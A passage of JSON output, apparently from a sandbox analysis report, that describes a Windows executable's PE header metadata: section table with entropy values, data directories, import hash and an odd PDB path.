2240. "reported_checksum": "0x0005251b",
2241. "icon_hash": null,
2242. "entrypoint": "0x00407b76",
2243. "timestamp": "2018-07-23 08:18:02",
2244. "osversion": "5.1",
2245. "sections": [
2246. {
2247. "name": ".text",
2248. "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
2249. "virtual_address": "0x00001000",
2250. "size_of_data": "0x00029600",
2251. "entropy": "6.72",
2252. "raw_address": "0x00000400",
2253. "virtual_size": "0x000294dd",
2254. "characteristics_raw": "0x60000020"
2255. },
2256. {
2257. "name": ".rdata",
2258. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
2259. "virtual_address": "0x0002b000",
2260. "size_of_data": "0x00013200",
2261. "entropy": "6.07",
2262. "raw_address": "0x00029a00",
2263. "virtual_size": "0x000130b2",
2264. "characteristics_raw": "0x40000040"
2265. },
2266. {
2267. "name": ".data",
2268. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
2269. "virtual_address": "0x0003f000",
2270. "size_of_data": "0x00002200",
2271. "entropy": "2.74",
2272. "raw_address": "0x0003cc00",
2273. "virtual_size": "0x00014cc8",
2274. "characteristics_raw": "0xc0000040"
2275. },
2276. {
2277. "name": ".rsrc",
2278. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
2279. "virtual_address": "0x00054000",
2280. "size_of_data": "0x00006400",
2281. "entropy": "6.31",
2282. "raw_address": "0x0003ee00",
2283. "virtual_size": "0x000063b0",
2284. "characteristics_raw": "0x40000040"
2285. },
2286. {
2287. "name": ".reloc",
2288. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
2289. "virtual_address": "0x0005b000",
2290. "size_of_data": "0x00002400",
2291. "entropy": "6.55",
2292. "raw_address": "0x00045200",
2293. "virtual_size": "0x000022a0",
2294. "characteristics_raw": "0x42000040"
2295. }
2296. ],
2297. "resources": [],
2298. "dirents": [
2299. {
2300. "virtual_address": "0x00000000",
2301. "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
2302. "size": "0x00000000"
2303. },
2304. {
2305. "virtual_address": "0x0003d4fc",
2306. "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
2307. "size": "0x0000003c"
2308. },
2309. {
2310. "virtual_address": "0x00054000",
2311. "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
2312. "size": "0x000063b0"
2313. },
2314. {
2315. "virtual_address": "0x00000000",
2316. "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
2317. "size": "0x00000000"
2318. },
2319. {
2320. "virtual_address": "0x00000000",
2321. "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
2322. "size": "0x00000000"
2323. },
2324. {
2325. "virtual_address": "0x0005b000",
2326. "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
2327. "size": "0x000022a0"
2328. },
2329. {
2330. "virtual_address": "0x0002b250",
2331. "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
2332. "size": "0x00000038"
2333. },
2334. {
2335. "virtual_address": "0x00000000",
2336. "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
2337. "size": "0x00000000"
2338. },
2339. {
2340. "virtual_address": "0x00000000",
2341. "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
2342. "size": "0x00000000"
2343. },
2344. {
2345. "virtual_address": "0x00000000",
2346. "name": "IMAGE_DIRECTORY_ENTRY_TLS",
2347. "size": "0x00000000"
2348. },
2349. {
2350. "virtual_address": "0x00000000",
2351. "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
2352. "size": "0x00000000"
2353. },
2354. {
2355. "virtual_address": "0x00000000",
2356. "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
2357. "size": "0x00000000"
2358. },
2359. {
2360. "virtual_address": "0x0002b000",
2361. "name": "IMAGE_DIRECTORY_ENTRY_IAT",
2362. "size": "0x000001f8"
2363. },
2364. {
2365. "virtual_address": "0x00000000",
2366. "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
2367. "size": "0x00000000"
2368. },
2369. {
2370. "virtual_address": "0x00000000",
2371. "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
2372. "size": "0x00000000"
2373. },
2374. {
2375. "virtual_address": "0x00000000",
2376. "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
2377. "size": "0x00000000"
2378. }
2379. ],
2380. "exports": [],
2381. "guest_signers": {},
2382. "imphash": "1f9917f590ed0711a560b3a3a279ed67",
2383. "icon_fuzzy": null,
2384. "icon": null,
2385. "pdbpath": "C:\\madakonezanudano69\\widagemokiredugic-difulib-fu.pdb\\x00in\\kolanu.pdb\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xa8\\x00\\x00\\x00\\xa7",
2386. "imported_dll_count": 2,
2387. "versioninfo": []
2388. }
2389. }